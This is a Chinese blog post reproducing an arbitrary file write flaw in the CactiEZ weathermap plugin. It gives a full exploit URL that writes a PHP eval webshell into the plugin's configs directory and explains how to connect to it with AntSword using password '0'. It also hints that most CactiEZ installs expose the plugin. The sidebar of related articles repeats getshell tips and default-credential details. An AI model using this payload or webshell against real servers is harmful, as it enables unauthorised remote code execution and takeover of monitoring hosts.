CactiEZ weathermap插件任意文件写入

已于 2023-07-07 16:40:27 修改
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
于 2023-01-17 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/128701185
版权

漏洞特征

CactiEZ的登录界面,大多数都会存在weathermap的插件,这样我们就可以尝试该网站是否存在任意文件写入漏洞了

漏洞复现 

我们直接在url处进行文件写入命令的操作即可。

/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name

这时候我们访问特点的url即可看见我们的shell

http://**.**.**.**/plugins/weathermap/configs/test.php

 这时候我们使用蚁剑去连接,密码是0,即可顺利连接上靶机。

http://**.**.**.**/plugins/weathermap/configs/test.php

 

仲瑿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CactiEZ架設文件
03-13
CactiEZ 是一个预装了Cacti监控软件的Linux发行版,它简化了Cacti的安装和配置过程,使用户能够快速地监控主机流量和硬件信息。以下是CactiEZ安装和配置的关键步骤及相关的知识点: 1. **安装CactiEZ**: - 开始...
php安全件,weathermap 件 editor.php 的安全性问题
weixin_39783156的博客
04-07 362
最近刚部署完CactiEZ+weathermap+nagios+npc的整合,发现一个问题,weathermap下的editor.php文件是任何人都能访问的,并能修改气象图,如下图。通过google的搜索相关的信息,从Weathermap的网站看到,editor.php是没有做验证的,任何人都可以修改你的气象图配置文件的。但其网站也提供了一个解决方法,如下Order Deny,AllowDeny...
利用cacticg getshell
m0_46689007的博客
11-29 689
获得用户名密码,admin密码MD5解码失败,改写admin密码为123456,结束后再将密码改回去。扫描目录发现有phpmyadmin,存在弱口令root/root。通过更改前端type参数为text,泄露邮箱账号和密码。发现存在weathermap任意文件写入漏洞。再查看8980端口发现为cactize服务。查看7025端口为机房后台,弱口令没进去。登录后,没有找到getshell的地方。先用 Nmap扫描ip端口开放情况。蚁剑连接getshell。上传webshell。
严重的Cacti漏洞可导致攻击者执行远程代码
最新发布
smellycat000的专栏
05-14 131
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士广泛使用的网络监控工具 Cacti 最近发布重要安全更新,修复了一系列漏洞,其中最严重的是CVE-2024-25641,CVSS评分为9.1。严重的RCE漏洞CVE-2024-25641可导致拥有“导入模板”权限的认证用户在托管 Cacti 应用的服务器上执行任意PHP代码。该漏洞是因为对函数 import_package() 中所上传的 XML...
weathermap 件 editor.php 的安全性问题
weixin_34174105的博客
06-27 464
最近刚部署完 CactiEZ+weathermap+nagios+npc的整合,发现一个问题,weathermap下的editor.php文件是任何人都能访问的,并能修改气象图,如下图。通过google的搜索相关的信息,从Weathermap的网站看到,editor.php是没有做验证的,任何人都可以修改你的气象图配置文件的。但其网站也提供了一个解决方法,如下weatherm...
Cacti 无法启用气象图和气象图中图标添加
weixin_33748818的博客
06-22 470
/var/www/html/plugins/weathermap/p_w_picpaths/ 这就是存放气象图图标文件。服务器上yuminstalllrzszCRT连接服务器后启用SFTPsftp> cd /var/www/html/plugins/weathermap/p_w_picpaths/sftp> put 完成。Theeditorhas...
CactiEZ 中文版snmp默认团体名漏洞
3569
03-28 1785
http://www.freebuf.com/vuls/3208.html这个漏洞真强大啊,虽然是信息搜集,但是把服务器上的所有软甲和版本号都直接给你了 ...佩服,实在是佩服,这个功能的实现者 ...CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改导致可以远程读取目标设备主机信息。如:snmputil.exe walk 127.0.0.1 public ....
被动扫描工具(myscan)
lza20001103的博客
08-29 1683
被动扫描工具(myscan) 文章目录被动扫描工具(myscan)前言运行原理演示地址如何运行检测件优势与不足 前言 myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。 此项目源自个人开发项目,结合个人对web渗透,常见漏洞原理和检测的代码实现,通用poc的搜集,被动扫描器设计,以及信息搜集等思考实践。 运行原理 myscan依赖burpsuite和redis,需启动redis和burpsuite
CactiEZ V10.1.zip
01-20
CactiEZ中文版是最简单有效的Cacti中文解决方案,整合Spine,RRDTool和美化字体。集成Thold,Monitor,Syslog,Weathermap,Realtime,Errorimage,Mobile,Aggregate以及Apache,Squid,F5,Nginx,MySQL等模板。...
CactiEZ安装教程
06-29
它整合了Spine、RRDTool、Thold、Monitor、Syslog、Weathermap、Realtime、Errorimage、Mobile、Aggregate等工具,提供全中文界面,并支持邮件和声音报警。CactiEZ适用于监控网络流量、服务器性能和各种网络设备,如...
CACTIEZ-CACTI-brocade交换机 模板
10-19
CACTIEZ 测试使用没有问题 出现哈希错误 按CACTI版本以下修改hash_**0021 Take the following example: The first 2 digits are the type of the template. The next 4 digits are the Cacti version it was ...
中文cactiez基于snmp监控管理软件
12-16
#CactiEZ v10.1 install text cdrom mediacheck lang en_US.UTF-8 keyboard us rootpw CactiEZ firewall --service=ssh --service=snmp --service=http authconfig --enableshadow --passalgo=sha512 --enablefingerprint selinux --disabled timezone Asia/Shanghai network --bootproto=static --ip=192.168.0.32 --netmask=255.255.255.0 --gateway=192.168.0.1 --nameserver 8.8.8.8 --hostname=CactiEZ.local --noipv6 --onboot=yes bootloader --location=mbr zerombr yes clearpart --all --initlabel part /boot --fstype=ext4 --size=200 part pv.cZWdAb-3EW9-0foh-Bl0a-To6S-TJez-7moyho --grow --size=200 volgroup vg_cactiezv10 --pesize=4096 pv.cZWdAb-3EW9-0foh-Bl0a-To6S-TJez-7moyho logvol / --fstype=ext4 --name=LogVol00 --vgname=vg_cactiezv10 --grow --size=8192 logvol swap --name=LogVol01 --vgname=vg_cactiezv10 --size=1024 repo --name="CactiEZ" --baseurl=file:///mnt/source --cost=100 %packages --nobase --excludedocs @core @server-policy man file vim-enhanced openssh-clients lftp ftp wget curl elinks net-snmp-utils net-snmp httpd php mysql-server php-mysql php-gd expect ntp rsyslog-mysql pango system-config-network-tui %post --nochroot mkdir -p /mnt/sysimage/tmp/cactiez >> /tmp/ins.log 2>&1 cp /mnt/source/Packages/cactiez-i386.tgz /mnt/sysimage/tmp/cactiez >> /tmp/ins.log 2>&1 %post cd /tmp/cactiez >> /tmp/ins.log 2>&1 tar zxvf cactiez-i386.tgz >> /tmp/ins.log 2>&1 cp -rf /tmp/cactiez/var/www/html/* /var/www/html >> /tmp/ins.log 2>&1 cp -rf /tmp/cactiez/usr/* /usr >> /tmp/ins.log 2>&1 cp -rf /tmp/cactiez/etc/* /etc >> /tmp/ins.log 2>&1 service mysqld start >> /tmp/ins.log 2>&1 /usr/bin/mysqladmin --user=root create cacti >> /tmp/ins.log 2>&1 mysql -e "GRANT ALL ON cacti.* TO cactiuser@localhost IDENTIFIED BY 'cactiuser'" >> /tmp/ins.log 2>&1 mysql cacti > /tmp/ins.log 2>&1 chmod -R 777 /var/www/html/log/ chmod -R 7755 /var/www/html/rra/ chmod -R 755 /var/www/html/scripts/ chmod -R 755 /usr/local/spine/bin/ chmod -R 755 /usr/local/rrdtool/bin/ chown -R apache:apache /var/www/html/ echo '*/10 * * * * /usr/sbin/ntpdate 0.rhel.pool.ntp.org && /sbin/clock -w' > /tmp/crontab2.tmp echo '*/5 * * * * php /var/www/html/poller.php > /dev/null 2>&1' >> /tmp/crontab2.tmp crontab /tmp/crontab2.tmp rm /tmp/crontab2.tmp for service in httpd mysqld snmpd do chkconfig --level 235 $service on done #rm -rf /tmp/* %end
CACTI CACTIEZ华为S5720主机模板有内存 CPU 温度监控
04-25
标题中的"CACTI CACTIEZ华为S5720主机模板有内存 CPU 温度监控"表明我们可以通过定制的CACTI或CACTIEZ模板来监控华为S5720的内存使用情况、CPU负载以及设备温度。这样的模板使得监控更加精准和高效,能够及时发现并...
CactiEZ安装部署手册
08-22
CactiEZ安装部署手册
cactiez advance-ping监控模板
06-28
1. 将`cacti_graph_template_ping_advanced_ping_v1_3.xml`文件导入Cacti的Web界面。 2. 配置数据源,指定要监控的设备和参数。 3. 应用图形模板,创建监控图表。 4. 根据需要配置警报规则。 ### 5. 维护与优化 ...
cactiez华为ar路由器监控模板
06-28
cactiez华为ar路由器监控模板
【Cacti】CactiWeathermap使用
feilong0663的专栏
07-11 3679
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://pengyl.blog.51cto.com/5591604/1230922 weathermap安装好后会有一个配置文件simple.conf,当我们需要weathermap画图的时候,第一步就是要在其所在目录下增加相应的配置文件, 查找simple.conf所在位
修复路径穿越、任意文件写入漏洞
InterestAndFun的博客
02-23 7090
前段时间随手写的一个文件上传服务,在公司的渗透测试下漏洞百出,其中少不了路径穿越和任意文件写入漏洞。其实这两个漏洞的修复并不复杂,只要对入参进行两个条件的校验就可以了。
cacti poller.php详解,Cacti件详解——Weathermap
weixin_32770423的博客
03-28 571
这些漂亮的网络拓扑都是用weathermap画出来的!这么长时间了没有发出来,今天就写以下weathermap的用法,以下都是我自己的理解,如有错误之处请谅解!weathermap是用来做网络拓扑图的,其中可以调用mrtg和cacti的流量图,可以生成静态的html页面。具体的例子大家可以中国科大的这个http://linux.ustc.edu.cn/weathermap的官方网站为 http:/...
Cacti1.2.18安装 weathermap
05-30
要在Cacti 1.2.18上安装Weathermap件,您可以按照以下步骤进行操作: 1. 下载Weathermap件并解压缩文件 您可以从Weathermap官方网站(http://www.network-weathermap.com/)下载最新版本的Weathermap件,并将其解压缩到Cacti的件目录中,例如:/var/www/html/cacti/plugins/。 2. 安装依赖项 Weathermap需要一些依赖项才能正常运行,您可以使用以下命令安装它们: ``` sudo apt-get install libgd-dev librrds-perl libdbi-perl libapache2-mod-php php-gd php-cli php-mbstring php-gettext php-xml ``` 3. 启用件 在Cacti的管理界面中,转到“件管理”部分,并启用Weathermap件。 4. 配置件 一旦启用了件,您可以转到“件管理”部分中的Weathermap选项卡,并配置您的地图。 5. 创建一个地图 在件配置完成后,您可以创建一个地图并将其添加到Cacti的主页中。要创建一个地图,请按照以下步骤进行操作: - 转到Weathermap选项卡,并单击“新建地图”按钮。 - 为地图命名,并选择要在地图上显示的设备。 - 使用Weathermap语言(类似于CSS)定义地图的外观和行为。 6. 在Cacti主页中显示地图 要在Cacti主页中显示地图,请转到“管理”>“主页”>“主页组件”,并添加一个“地图”组件。选择您刚刚创建的地图,并将其添加到主页中。 希望这些步骤对您有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值